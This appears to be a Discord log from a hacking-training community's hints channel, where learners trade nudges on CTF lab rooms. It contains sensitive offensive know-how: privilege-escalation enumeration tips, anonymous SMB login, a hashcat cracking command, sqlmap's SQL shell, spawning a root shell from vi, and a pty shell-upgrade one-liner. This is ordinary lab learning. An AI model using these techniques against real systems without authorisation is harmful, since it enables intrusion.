#room-hints

1 messages · Page 58 of 1

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

white salmon
#

oof

#

😭

#

that hurts 😭

hollow forum
#

can i get a hint or even i cant ask for help on jacobtheboss

#

bcoz i think its also a new room

stuck fractal
#

It's been a couple of days

white salmon
#

but this root me one

#

its broken or something

#

i uploaded it 14 diffrent times

stuck fractal
#

You have asked. But if people haven't completed the box, they can't help you @hollow forum

#

@white salmon Elf it aint broke, it was tested and loads of people have completed it

white salmon
#

it doesn't love me

#

then

astral smelt
#

@white salmon I was having the same problem that’s why I left it

white salmon
#

its so hard

#

like what is the problem why cant i upload it

astral smelt
#

Oh wait I know what you mean no I had that problem once then it worked

white salmon
#

How long till a room is not considered "recent" anymore and can ask questions? 🤔

astral smelt
#

Whenever the room creator allows it or when writeups are accepted

white salmon
#

@white salmon if i know what u mean its not a bug youre just doing something wrong

stuck fractal
#

How long till a room is not considered "recent" anymore and can ask questions? 🤔
@white salmon 2-3 days generally

white salmon
#

oh if so im just wondering in the room Jacob the Boss in the privesc part using|| the C.O.W. exploit is the correct path or im wasting time? Because im messing around with the code as it seems to get stuck in some part and won't actually add a new root user as its supposed (one of the variants of the exploit). And im almost giving up this path.||

hollow arch
#

oh if so im just wondering in the room Jacob the Boss in the privesc part using|| the C.O.W. exploit is the correct path or im wasting time? Because im messing around with the code as it seems to get stuck in some part and won't actually add a new root user as its supposed (one of the variants of the exploit). And im almost giving up this path.||
@white salmon That's not the exploit..tried it several times too...

white salmon
#

oh good to know, gave up on it already

white salmon
#

OH JESUS CHRIST IM SO blind 💀

novel jackal
#

OH JESUS CHRIST IM SO blind 💀
It was at this moment that bob knew, he rooted-up.

silver meteor
#

happy hacking guys
any idea with the Jeff's room user.txt answer field?

stuck fractal
#

You need to do something to the text

silver meteor
#

can i ask u privately for avoiding of an spoil?

stuck fractal
#

Nope, because I can't give you any more info without spoiling it.

silver meteor
#

OK

#

done it
that was annoying

#

but the room was amazing after all
exept the user.txt part

dim hare
#

did anyone here solved "jacob the boss" room?

stuck fractal
#

Just ask directly

#

If someone can help, they will.

#

Mark as a spoiler if you need.

dim hare
#

i wan

did anyone here solved "jacob the boss" room?
@dim hare i want hints about the privilege escalation of this room? , i was able to connect with two different users , i did a lot of enumeration i searched for kernel exploitation but it didn't work to get root or read the file and i was able to get hashed password but what i did is that i changed to connect with the other user because i was not able to crack it or can i?

eternal brook
#

Priv escalation on that box is basic enumeration you can do it manually or use linpeas just look at everything carefully
If you're still stuck check out ||SUID FILES||

#

@dim hare

dim hare
#

Priv escalation on that box is basic enumeration you can do it manually or use linpeas just look at everything carefully
If you're still stuck check out ||SUID FILES||
@eternal brook okay , i did but i am going to look in depth.

ashen scaffold
#

Im still stuck on Mr.Robot CTF. I cant for the life of me figure out the reverse shell...Either my ip config is jacked up or I did something wrong

pure thistle
#

@woven mirage or you online

woven mirage
#

?

pure thistle
#

hey good eening got a ? about your WWBuddy room did you change the sqli payload attacck because its not working for me

woven mirage
#

Well, the sqli is not that easy to find

#

Try to think about everything that is input

#

In this situation you have to prepare the attack before for something tô happen after

oblique cliff
#

Im still stuck on Mr.Robot CTF. I cant for the life of me figure out the reverse shell...Either my ip config is jacked up or I did something wrong
@ashen scaffold what are you doing

ashen scaffold
#

@oblique cliff trying to get this reverse shell working.

oblique cliff
ashen scaffold
#

I think my issue is within my network config. I need to see if i can get a reverse shell elsewhere first

#

He is i was just replying to you. Thank you :)

#

I will test other things some other time. Im literally getting a headache from that room lol

oblique cliff
#

👌🏿

mighty pagoda
#

does anybody have a hint on how to scalate on tryhackme/room/jacobtheboss, i could connect as jacob and apache user, but i don't find how to privesc this pc

wintry yarrow
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

stuck fractal
#

@wintry yarrow Hey, it's been a couple of days now. Please bear in mind Rule 15 and leave enforcing the rules to the moderators.

#

@mighty pagoda there's a hint in this channel about 3 hours ago

wintry yarrow
#

Sorry about that.

mighty pagoda
#

i'm sorry guys, i haven't read the rules

mighty pagoda
#

but i will i promise

median marsh
#

Buffer overflow 3, is there really that much badchars or am i missing something?

copper token
#

@patent token Hello! In regards to the box "Relevant"...Should windows-exploit-suggester.py have pointed to the exploit you used in the write up? It didn't find it in my case by using exploit suggester. Or was this more of needing to do a google search based of the privileges you enumerated after getting the shell to discover it that way?

wooden mist
#

Afaik it's not an exploit per se, just abusing the privileges you have so the exploit suggester might not take it under consideration

copper token
#

I see. I was just trying to get the correct thought process behind discovering to use that priv escalation technique.

wooden mist
#

A useful thing to do on linux/windows after getting a shell is checking your groups and privileges, you might not need a exploit suggester after all :)

copper token
#

Yeah, after doing a google search based off the privileges found it lead me to the priv esc method 🙂

#

Off to bed. until tomorrow

white salmon
#

does anybody have a hint on how to scalate on tryhackme/room/jacobtheboss, i could connect as jacob and apache user, but i don't find how to privesc this pc
@mighty pagoda /4000

#

just read with attention the enumeration output, it took me a couple hours because I missread it

somber crag
#

Is anything related with ||NFS ||? @white salmon

white salmon
#

no, its related to permissions

somber crag
#

K

#

can I pm you for a sec @white salmon ?

white salmon
#

sure

royal kraken
stuck fractal
#

Read the question

#

Be specific

#

Read the manual

#

Google it.

white salmon
#

@pure thistle just take the sql injection and paste it every where you can, eventually itll work

wintry yarrow
#

Need hint on Year of the Rabbit room. ||Got ssh shell as eli and couldn't find anything much suspicious so tried linux exploit suggester and saw it is vulnerable to dirtycow and dirtycow2 so I ran it but it crashed the machine.||

stuck fractal
#

Kernel exploits should always be your last resort

#

Do traditional privesc enum

wintry yarrow
#

Linpeas?

stuck fractal
#

Or do it manually

#

Thinks like enumerating sudo rights, suid binaries, binary capabilities

wintry yarrow
#

Okay let me try, thanks.

#

||I've found 4 custom suid's but only /usr/lib/pt_chown looks suspicious.|| Am I on right track?

#

Nvm its not useful.

#

Still can't find anything super interesting. Need another hint.

analog fiber
#

Hello everyone.

#

I just wanted to point out that the github link to LinEnum doesn't work

stuck fractal
analog fiber
#

This is in the Linux Privilege room in the Linux Beginner room.

#

Ok. Will do. I was just wondering if anyone else was having this problem installing LinEnum. When you type git clone in front of the address, nothing happens

stuck fractal
#

Ok that's different

#

You said the link doesn't work

#

Not that you can't get git cloning working

#

Being specific and accurate is really crucial if you want help. Can you provide a screenshot of what you're doing please?

analog fiber
#

Ok. I am typing this in on the THM VM. Also, my target is not the THM VM, but my own Kali Linux VM. SSH isn't working on my end. SSH is timing out.

stuck fractal
#

That's not your target

oblique cliff
#

@wintry yarrow I don't think it's too hidden iirc

stuck fractal
#

And whatever you're doing, it's confusing and weird

oblique cliff
#

just some regular enumeration should work

stuck fractal
#

@analog fiber The VMs on tryhackme don't have internet access. You need to download the script locally and copy it over.

analog fiber
#

Oh, ok. That could explain why when I try to copy LinEnum over to my Kali Linux VM using SSH (I am using VMware Workstation), it times out.

stuck fractal
#

Wat

wintry yarrow
#

||I found two suspicious directories with linpeas but I think that's just another rabbit hole. And got 4 custom suids and some db and 2 services running locally. That's all. Also, there a core named file on home directory.||

stuck fractal
#

Copy it from where to where, and how? @analog fiber

analog fiber
#

Well, I am using the THM VM to get LinEnum on my target machine (which is my Kali Linux VM)

stuck fractal
#

That did not answer any of my questions

#

Your target machine is not your Kali machine

analog fiber
#

Ah, so it has to be the THM VM?

stuck fractal
#

It?

analog fiber
#

The target machine

stuck fractal
#

The target for what?

#

You're being really vague where it matters, and really specific where it doesn't.

#

You're not providing screenshots. You're not answering questions. I'm going to give up in a minute.

oblique cliff
#

@wintry yarrow ||sudo -l||

orchid fossil
#

||I found two suspicious directories with linpeas but I think that's just another rabbit hole. And got 4 custom suids and some db and 2 services running locally. That's all. Also, there a core named file on home directory.||
@wintry yarrow If you are still stuck on the first user, you should see something interesting immediately when you ssh-ed in.

wintry yarrow
#

@oblique cliff It shows its not in user in not sudoers iirc.

#

@orchid fossil Yeah, I saw that but can't find the ||place||.

orchid fossil
#

yes you can find it.

wintry yarrow
#

Ummm ||find||, gotta try.

oblique cliff
#

wait which user are you

wintry yarrow
#

Eli.

oblique cliff
#

oh my b

#

ok did you see the message pop up when you first got into the box?

wintry yarrow
#

Yup.

#

Yeah, I saw that but can't find the ||place||.

oblique cliff
#

maybe ||gwendoline owns it||

#

i dont actually remember thats just something to try

wintry yarrow
#

||find / -uname gwendoline 2> /dev/null||?

#

Or something like that.

oblique cliff
#

try it on something you know should work

#

so do that same command with Eli and see if it gives back what you expect it to

wintry yarrow
#

find command right?

#

Let me try.

oblique cliff
#

yes

dark cipher
#

Can someone provide a nudge for the root part in Jacob the Boss room? I've turned like every stone and couldn't find anything.

stuck fractal
#

Run some enum scripts

#

Look for sudo rights, suid binaries, capabilities

dark cipher
#

I gotta be blind then. Sudo I obviously can't do anything with since I don't have jacob's password and suid and sgid binaries are all default ones

#

@stuck fractal

stuck fractal
#

I can't really help more

dark cipher
#

well, I'm overlooking something by a lot

#

let me try again

dusty saddle
#

I am currently doing the "Upload Vulnerabilities" Room. I am kind of stuck at Task 9. I managed to upload my shell by changing the Magic Number to the one that GIFs usually have. However now that i try to execute it throws the following error: The image http://magic.uploadvulns.thm/graphics/shell.php5\ cannot be displayed because it contains errors." Did i do something wrong?

#

And i have netcat open but i dont think that the shell executed

#

Does someone have a hint for me?

#

The task mentions this: This task will not do so to keep it relatively easy; however, directory indexing has been turned off, so you will not be able to navigate to the directory containing the uploads. Instead you will need to access the shell directly using its URI.
Is my path maybe wrong and it just throws a weird error (contains error=maybe the shell is saved somewhere else?)

delicate timber
#

Room: Crack The Hash
Task 1 #4
Im runing the hash through hashcat but it has been over an hour, is there a way to do it more efficiently?
hashcat -a 0 -m **** ~/path to/hash.txt ~/path to/rockyou.txt

stuck fractal
#

That's bcrypt

#

It's going to take a while

delicate timber
#

oh

stuck fractal
#

Use what you know about the plaintext to speed up your search

#

You know that it's 4 characters

#

And you know it's in rockyou

delicate timber
#

okay, thank you 🙂

oblique cliff
#

@wintry yarrow what was the message when you first sshd in

wintry yarrow
#

||Message from Root to Gwendoline:

"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"

END MESSAGE||

oblique cliff
#

What’s the keyword in there

wintry yarrow
#

||s3cr3t ||?

oblique cliff
#

Yea

#

If you couldn’t find it with find try locate instead

wintry yarrow
#

I tried find already.

oblique cliff
#

If you couldn’t find it with find try locate instead

wintry yarrow
#

Oh, no.

#

Locate worked.

oblique cliff
wintry yarrow
oblique cliff
#

Yay!

#

Why sad?

#

Happy!

wintry yarrow
#

Thank you. And sorry to trouble you.

oblique cliff
#

No trouble at all 🙂

wintry yarrow
oblique cliff
#

Also a hacky way to do it if you’re unable to form a good find statement is something dumb like ||find / | grep s3cr3t||

#

Better to learn the find command but whatever works works @wintry yarrow

#

Idk if that’ll work btw I think it should tho

stuck fractal
#

Don't pipe find into grep ewwwwww

oblique cliff
#

We teach hacks that work here

wintry yarrow
#

I tried something like find / -type d -name s3cr3t 2> /dev/null.

oblique cliff
stuck fractal
#

It's not difficult to do it properly, so do it properly

oblique cliff
#

You needed a regex

#

You were trying to find a file or directory with that exact name

#

You need like *s3cr3t*

wintry yarrow
#

I misspelled I tried like * secret *.

stuck fractal
#

wrap it in backticks

#

*secret*

wintry yarrow
#

Discord removed *.

#

*secret*
That's what I tried.

stuck fractal
#

Backticks in discord

wintry yarrow
#

*secret*

#

Yeah, need to place inside em.

stuck fractal
#

'*thing*'

#

Just make sure shell globbing isn't messing with you

wintry yarrow
stuck fractal
#

No

#

Not backticks there

#

single quotes

wintry yarrow
#

Anyway locate works.

#

I guess I can't rely on find from now on.

oblique cliff
#

no you can rely on find, you just have to use it right

wintry yarrow
#

Still locate is simple.

oblique cliff
#

find is more powerful

wintry yarrow
#

So is Vim. But I prefer nano haha.

#

Tell me how to close vi lol.

oblique cliff
#

just do find / -name "s3cr3t" 2>/dev/null

#

does that not find it?

#

:wq lol

#

@stuck fractal blobknife

stuck fractal
#

You saw nothing

wintry yarrow
#

does that not find it?
Nope.

#

Seriously I can't quit vi.

delicate timber
#

escape then :q!

wintry yarrow
#

Ha that worked. Thanks.

stuck fractal
#

Esc, :sh

#

No need to leave vi to get to a shell

oblique cliff
#

lmao

#

Nope.
@wintry yarrow show me

wintry yarrow
#

No need to leave vi to get to a shell
Thanks, got root.

oblique cliff
wintry yarrow
#

I was trying something different with vi.

oblique cliff
#

Oi

#

whatd we talk about

stuck fractal
#

delet

wintry yarrow
stuck fractal
#

But also you showed yourself using that earlier

#

plz delet spoil

wintry yarrow
#

Here's Blob's knife.

#

Okay, sorry.

#

Just wanted to let you know it worked.

oblique cliff
#

But also you showed yourself using that earlier
@stuck fractal where?

jolly sigil
#

So how do I know what I'm supposed to use as the answer

oblique cliff
#

try refreshing the page?

stuck fractal
#

It's meant to look like that

#

It's the for the flag that the webapp gives you when you complete that activity

jolly sigil
#

where do i find the flag

#

i've seen a couple of the notifications so far

astral smelt
#

It will be a popup

#

Once you have completed a task in Juice Shop a popup will happen and you will get your flag

jolly sigil
#

Ah I see

#

I was coming from the previous Burp room that let me just deploy it on heroku and use that

granite plover
#

Hey everyone. I'm stuck on Relevant. I have done some smb enumeration and have found a passwords.txt file and now have 2 credentials. Can't seem to do anything with them other than login to smbclient. Have tried to RDP into the server. doesn't seem to work. psexec.py doesn't work either. Have tried manual EternalBlue and also tried EternalBlue using Metasploit. no luck. I'm looking for a nudge. Am i going down the correct rabbit hole?? Thanks in advance

stuck fractal
#

It's not blue.

patent token
#

Tell me about what you’ve scanned so far.

#

I can give you a hint based on that

granite plover
#

ahhh so i was going down the wrong path!! i thought so as nothing was working

patent token
#

The entire purpose of the challenge is to make a big stink over something that is seemingly obvious, and force the user to know when what they’re doing just isn’t going to work.

#

So you’ve tried the smb creds, eternal blue, etc. and nothing works. Go back to your initial scan and look it over. Was it thorough enough? Have you checked and enumerated all services? Etc.

granite plover
#

nmap showed port 80, 135, 139, 445 and some other bigger ports one was another RPC and i can't remember the other one. used gobuster and wfuzz and pretty much determined that there is next to nothing behind port 80. then went onto smb enumeration and then tried EternalBlue

patent token
#

I’d take a look at those upper ports again. That’s your hint. 😁

granite plover
#

one thing i didn't do was scan udp

patent token
#

No udp

granite plover
#

i didn't think so

#

i got some practice executing eternalblue anyway

patent token
#

What port numbers do you see in the upper ones?

#

Can use spoiler tags if you need.

granite plover
#

this is from memory so i might miss one. 80, 135, 139, 445... then there was windows terminal services in the 3000s i think... i don't have my hacking computer next to me

patent token
#

So it’s important to do a full port scan. All 65535.

#

When you have a chance try that.

granite plover
#

i did see a really big one i think it was rpc... i did -A -p- so i should have gotten them all

patent token
#

Check your notes if you took them. You should see your next step.

granite plover
#

ok thanks. just backing out of the EternalBlue path i was on should get me going again.

patent token
#

😁 enjoy! If you get stuck any further feel free to ask for another hint.

granite plover
#

ok thanks!

swift hatch
#

Hello I'm stuck on Burp Suite Room Task 10 number 2. I'm not sure what should I do. Can you help me pls

stuck fractal
#

What's wrong?

swift hatch
#

I don't know how to dig for a response issues a cookie

stuck fractal
#

That's what you're going to leadn

#

There's an instruction

swift hatch
#

Got it, thx a lot!

silver meteor
#

@patent token recently visited ur github page, mate
keep up the hard work 🍺

stuck fractal
#

That's a brand new room

#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

stuck fractal
#

Please wait a few days before asking for help with new rooms @gusty turtle

gusty turtle
#

That's a brand new room
@stuck fractal 45 days old?

stuck fractal
#

It was released today.

#

It's a brand new room.

gusty turtle
#

Oh Ok

stuck fractal
#

Because that's when the room was created. Not when it was released.

#

That's being fixed.

gusty turtle
#

Oh ok.

Because that's when the room was created. Not when it was released.
@stuck fractal

dire zinc
#

Need a hint on Lian_Yu, cant find first dir

final mortar
#

The very first task ? Can you not run the command properly or you don't see the directory @dire zinc

#

Also, which wordlist you used

dire zinc
#

Yea, medium... something

final mortar
#

Be specific

#

The directory is in /dirb/big.txt for sure, can't say about the wordlist you are using

dire zinc
#

@final mortar only found /island

#

kinda stuck on that

final mortar
#

Have you tried re-busting the directory you found ?

dire zinc
#

thats what im doing rn, so far nothing

final mortar
#

Don't you think you should wait for the scan to finsh before asking for further help 🙂

random gorge
#

can someone help me on iron corp please?

final mortar
#

Check pins

#

@delicate timber If you are looking for hints, then you need to keep decoding it further, you are good till now

delicate timber
#

more layers... wow, okay thank you

#

Got it thank you!

serene light
#

where can I find the format to ask for hints here?

astral smelt
#

To ask for hints you ask here

serene light
#

Ok. Didnt want someone to grill me if the question needed to be a specific format...

stuck fractal
#

Check the pins for at least a loose guide

#

Try to mark things as a spoiler if you need to.

serene light
#

I am in room/ccpentesting
task 18 question 6
checked walkthroughs

did a dump of the db on question 4

Check the pins for at least a loose guide
@stuck fractal exactly what i needed. thanks

stuck fractal
#

If you've checked the writeups and want more than just a hint, #room-help is better suited

serene light
#

the walkthroughs were no hint lol. 1 link is dead and the other only covers some "final exam" section of room. Still need to go to help?

stuck fractal
#

Depends if you just want a hint

serene light
#

yes just hint .

stuck fractal
#

Ok, so where are you stuck?

serene light
#

room/ccpentesting
task 18 question 6
cannot find the flag. doing a dump does not return expected results. not sure if I should stay in scope of question before or broaden my scope

stuck fractal
#

Might be the wrong table

serene light
#

hmm. I dumped all tables in the DB in scope of question 4. they look relatively the same.

stuck fractal
#

you can add --sql-shell or something and run queries manually

#

I'd recommend that tbh

serene light
#

I'll give a shot thank you

delicate timber
#

hmm. I dumped all tables in the DB in scope of question 4. they look relatively the same.
@serene light oh no just dump, I did the same, took forever but dump not dump-all

serene light
#

@serene light oh no just dump, I did the same, took forever but dump not dump-all
@delicate timber I must be doing something horribly wrong. When I --dump the tables in the db from question 4, but those values dont make sense to me (trying not to give anything away on accident)

tawny crystal
#

Hi all , in PowerShell scripting room , which command can i use to get “cmdlets installed on the system only cmdlets not functions and aliases”???

strange cliff
#

What about which google dork to use

white salmon
#

did you do the google room?

strange cliff
#

No

#

I am doing cc pentesting

stuck fractal
#

Please don't show answers @strange cliff

#

But I would recommend reading manuals and doing research

strange cliff
#

Sorry bro

#

I was asking for help / hint

nova nest
#

How can i find a redirect page

#

to a website

#

im doing agent sudo ctf

vapid oyster
#

hi guys anyone facing issue to transfer file between kali and the windows 7 client provided to rdp into?

stuck fractal
#

@strange cliff Please don't call me bro. You don't know me and it implies an uncomfortable level of familiarity. One of the rules here, rule 13, essentially states that you should do your research before asking. I gave you a hint.

vapid oyster
#

i am doing windows privilege escalation

eternal brook
#

Looking at the main page of the website you have your hint there and check out who has written that note for you.
Play around with ||user-agent|| to find something juicy

#

@nova nest

#

As far as I remember you meant asking this in the 2nd ques

nova nest
#

the main website doenst have nothing

#

its just a simple html website

#

i will try changing ||user-agent||

eternal brook
#

i will try changing ||user-agent||
@nova nest then you're on the right path and get something

teal belfry
#

how to find open ports in disk image? like any plugin with volatility?

#

I need some hint in Forensics room Task 2

stuck fractal
wintry yarrow
#

Ask your question and someone may answer.

bitter laurel
#

Heya! I'm doing basic pentesting, and in the hint for the username question it said to use smb to find the username, but I've used countless programs and have gotten hopelessly lost trying to find it and was hopeing someone could give me a little nudge in the right direction ❤️

stuck fractal
#

@bitter laurel Have you tried some slightly more manual enumeration?

#

Names etc are often exposed in notes and documents

bitter laurel
#

Ah, once second 😄

#

one*

#

Yeah, I thought so. I looked at the 2 documents that where exposed to me but I could only find the first letters of the usernames, which where J and K respectivly

#

Unless I'm missing an elphant in the room 😄

stuck fractal
#

You should get slightly more info than that

bitter laurel
#

The only thing gobuster threw up was /De********

#

dont wanna spoil it

stuck fractal
#

Not gobuster

#

Try logging into the smb share

bitter laurel
#

I don't beleive I have any credentials to do it D:

#

I'm super new to it so I'm probably missing something really dumb PanFiteMe

stuck fractal
#

SMB can have Anonymous login enabled

#

Like FTP

#

Authenticating with username+password as "" or "Anonymous":""

bitter laurel
#

would smbmap be the right tool?

stuck fractal
#

Nope, just smbclient should do after you list shares

safe beacon
#

hey man i recommend using enum4linux.

#

it helps alot with enumeration

stuck fractal
#

There are re-written versions that are better

safe beacon
#

link

#

?

bitter laurel
#

am I doing it right?

#

smbclient -I 10.10.4.187 -u "" -P ""

#

I get 'not enough / in service' D:

stuck fractal
#

//ip/share

bitter laurel
#

?

#

oh

#

one sec

#

smbclient //ip/10.10.4.187 -U "" -P ""
Failed to open /var/lib/samba/private/secrets.tdb
ERROR: Unable to open secrets database
Failed to use machine account credentials

#

oof

stuck fractal
#

No

#

ip is the ip

#

share is the name of the share

bitter laurel
#

so share can be anything?

#

I'm so lost 😄

stuck fractal
#

You can list shares

#

You're a subscriber, I'd recommend doing the Network Services room

bitter laurel
#

Yeah, I am 😄

copper token
#

Hello! Similar to how you can break out of a "jail" shell on Linux using a command like** python -c 'import pty;pty.spawn("/bin/bash")'**, is there something you can do after getting a reverse netcat shell on a windows box? Something to make the shell more stable maybe...

trim haven
#

Screenshot what your shell looks like

copper token
#

It would be nice to be able to send a Ctrl-C inside the shell without killing the connection. Not sure how to do that

trim haven
#

use something like pwncat probably 🤷‍♂️

copper token
#

Anyone solved the machine relevant? I am having trouble looking for the second path to root. Can't find the second priv esc technique...

pine hazel
#

Room/Task/Number

copper token
#

The room is "Relevant" .. it says there are two paths to root but I only found one (the one in the write up)

patent token
#

It only pertains to initial access, not the privesc.

copper token
#

ahh ok

fluid field
#

room: ZTH: Web 2, Task 11. I've tried both dirbuster and wfuzz to look for a php file using big.txt, but i've only found 3 files, which don't seem to show any sign of command execution. Any hints? I've tried both of these patterns || ip:82/FUZZ.php ip:82/api.php?cmd=FUZZ||

mighty tinsel
#

Room Lian_YU

For finding hidden directory they given a clue
Only contains numbers and it was 4 digit
I tried with 4 digit wordlist for finding directory
But nothing found😭😭??

final mortar
#

What do you mean by 4 digit wordlists

#

also, make sure you are dirbusting at the right level

iron sapphire
#

trying for the bonus. which i'm sure is no longer a valid subscription, but its driving me nuts

trim haven
#

I believe there was an email

iron sapphire
#

for day 3

#

?

trim haven
#

Yes

#

You emailed and you got the code

iron sapphire
#

would you mind explaining to me how an href email is considered subcode and anything other than ridiculously obvious?

#

boy i overthought that one...........

trim haven
#

Yeah you just emailed and Muirland would reply with the code

#

But it's over now :/

iron sapphire
#

is a HREF link really considered subcode? i was thinking something linked to the dynamic HTML changing the HTML templates based on the username

trim haven
#

wut

iron sapphire
#

"If you know what a "subcode" is, and that's why you're here, kudos for the ingenuity! "

#

i just don't get the hint or the link....but i'm the newb so maybe over my head

trim haven
#

There's an email in the room

#

that you find

#

And when you find the email

iron sapphire
#

yes i found it in 2 mins

trim haven
#

Yes

iron sapphire
#

reading the source code of the hmtl

trim haven
#

People thought it was a fake email

#

But it was real

iron sapphire
#

didn't think that counted as ingenous

trim haven
#

and when you email it

#

You win

#

But

#

It has already been claimed

iron sapphire
#

oh well, thanks for ending the rabbit hole 🙂

#

and to the one guy on youtube who mentions it

jolly kiln
#

Hei im stuck at Upload Vulnerability Room

trim haven
#

Which part :D

jolly kiln
#

Looking for A Nudge I'm at last part

#

Unable to Capture Shell

trim haven
#

Hints are provided by Muirland

jolly kiln
#

Tried all Man Uploaded a shell Dir searched using Gobuster 5 files found

#

Yea man i am Already looking at it but Still stuck

#

I am At Admin Page

#

Hints Says ../content/Filename.jpg

#

But tried all combination nothing found

trim haven
#

What happens when you do it

jolly kiln
#

Module Does not Exists

#

?
Any nudge

deft sand
#

Hey every1 just got user and root for hackpark but didn’t go the route the rooms wants and have no idea what “abnormal service” I’m looking for - RDP’d in as administrator for flags...

#

(WinPEAS found the creds)

oblique cliff
#

Run power up and see if there are any weird services

deft sand
#

Sorted it thanks 🙂

buoyant wind
#

anyone here finished jokervm?

stuck fractal
#

Just ask your question 🙂

buoyant wind
#

well , i'm looking for any sources to learn about LXD Privilege Escalation cuz i almost finished the room but i stuck in the root part

stuck fractal
#

Have you typed "lxd privilege escalation" into google? There's some good articles just a click away

buoyant wind
#

I know, but I'm still looking for something suitable for a newbie 😆 anyway thanks dude

oblique cliff
#

hackingarticles @buoyant wind

patent token
dusk imp
eternal brook
#

I don't think so that's the right exploit lemme check my notes once

stuck fractal
#

Typically, when an exploit uses a proxy you'd have one running locally

#

IIRC you can just edit it out so it doesn't proxy anything

dusk imp
#

ty.

#

yeah, that worked, thanks James.

eternal brook
#

I'm sorry yea that's the right exploit :)

keen spruce
#

Has anyone finished "MAL: Researching" (https://tryhackme.com/room/malresearching) ? Task 4, Question 3. I have the correct date, but even with copy/paste I can't get it to accept it. Is there some trick to it that I'm missing?

solid patrol
#

in room snowball is ftp supposed to be slow?

woven mirage
#

no tips, room just released

solid patrol
#

wow

wise venture
#

Hi guys, quick question. Looking at the Burp Suite room and struggling to understand what the answer would be for question 4 on 'Puttin it on Repeater', I get a message in the browser to say that I solved the challenge, but can't find the answer that would fit the format of the length required, any help appreciated

trim haven
#

Could you screenshot the webpage saying you completed it?

#

:))

wise venture
#

OK, so another one in the Burp Suite room, looking at sequencer and performing analysis on the Set-Cookie request, the question is In order to find the usable bits of entropy we often have to make some adjustments to have a normalized dataset. What item is converted in this process? - struggling with this one, looking on the Bit Level Analysis tab and still can't see anything that mentions this

#

well bloomin' hell, got it finally 🙂

sick sun
#

anyone one knowing about ||Lorem Ipsum|| ?

stuck fractal
#

It's generic example text @sick sun

#

But I believe you have been asked before to follow Rule 13 and not ask for help on new rooms

livid perch
#

is the creator of snowball in the chat. Want to double check that your room isn't broken...

stuck fractal
#

@livid perch it's broken

ashen matrix
#

What part, if that isnt sarcasm?

stuck fractal
#

Idk what part

#

I just know it's broken

wet sorrel
#

The privesc is broken

stuck fractal
#

It was changed after it was tested, discussion came up in room tester chat

livid perch
#

@stuck fractal regardless can I get myt 7 hours of life back???

#

MAD

ashen matrix
#

Ok so Privesc part is. I am not up to that

stuck fractal
#

Unfortunately I cannot provide that service

livid perch
#

I demand justice

stuck fractal
#

I also didn't test it, please don't shoot the messenger here

wet sorrel
#

lol

#

I mean even if you did, it isnt the testers fault because it was changed right?

stuck fractal
#

Ideally the tester should be told and then retest it

livid perch
#

reset our progress?

#

hope not

#

oh retest I can't read with no sleep

#

yikes

dire zinc
#

need hint for Tartarus finding location of uploaded file

ashen matrix
#

@dire zinc enumerate more

#

what do you do when first enumerating a website? try that

dire zinc
#

tried gobuster

ashen matrix
#

Maybe you didnt use gobuster correctly

#

try using it again, recheck your command settings, maybe something is missing or a part is missing?

dire zinc
#

ok ty

#

how to i type something but make it hidden is discord

ashen matrix
#

use || at start and end

#

|| like this ||

dire zinc
#

|| gobuster dir -u 10.10.57.137/sUp3r-s3cr3 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 20 ||

#

This look right?

ashen matrix
#

nope

#

its wrong. very very slightly

#

look it over

dire zinc
#

holy f*ck do i feel dumb

ashen matrix
#

we all make mistakes, and staring at the same thing over and over youll over look it

dire zinc
#

i let that run for 30 mins 😆

#

fixed it, found it in 2 seconds

white salmon
#

i have a problem with the room ps empire

#

my exploit gives a fail

#

it was completed but didn't give a session

#

What did i do wrong

dusk imp
#

is LHOST correct?

white salmon
#

was filled with a 192 address

dusk imp
#

😛

#

working now?

white salmon
#

i'll try it in a minute thanks

#

that was the problem thanks I'm so stupid

dusk imp
#

man, it's just like that sometimes.

#

I did something similar yesterday. lol

white salmon
#

yeah it is that kind of day

dire zinc
#

any hints for privesc on gamingserver

trail compass
#

any hint for golden eye task2 #3 ? i must be stupid, i thoguth i tried it all but i probably miss something obvious. got all the rest of it haha

orchid fossil
#

any hints for privesc on gamingserver
@dire zinc Look at the groups and look at what you can do with it

#

any hint for golden eye task2 #3 ? i must be stupid, i thoguth i tried it all but i probably miss something obvious. got all the rest of it haha
@trail compass It's most probably a command that you used for that port

trail compass
#

hm ok maybe i forgot what was there, put the thing in i think i used and it was indeed correct. but i thinik running there was something else... but finally complete 🙂 thanks

quiet elm
#

any good tool to do web directory enum on "Relevant"? Tried gobuster, but kept getting "Client.Timeout exceeded" even on default thread setting

dusk imp
#

doing the xmas challenge, I'm on day 4 and I'm struggling with the mcsysadmin's password hash, I don't even know why

#

Google just brings up results for how to generate them, I've found what looks like a hash in known hosts but now I'm just stuck.

white salmon
#

Have you got the hash and you're trying to convert it?

#

Or are you trying to find it?

dusk imp
#

trying to find it

white salmon
#

(It's been a while since I've done it)

dusk imp
#

it says "What is mcsysadmin's password hash"

solemn smelt
#

Have you tried using find or grep to look for a password?

dusk imp
#

i did grep a password from a file.

#

i can not for the life of me use find correctly yet.

solemn smelt
#

try to look for a shadow backup file

dusk imp
#

oh thank you! i knew there was some reason for that in the supporting material

#

Does someone have a good resource for the find command, or is it more just trying to work it out using the manual because 99% of the time I just end up recursively searching everything.

steady stratus
dusk imp
#

I'm absolutely doing that after I finish this day then.

steady stratus
#

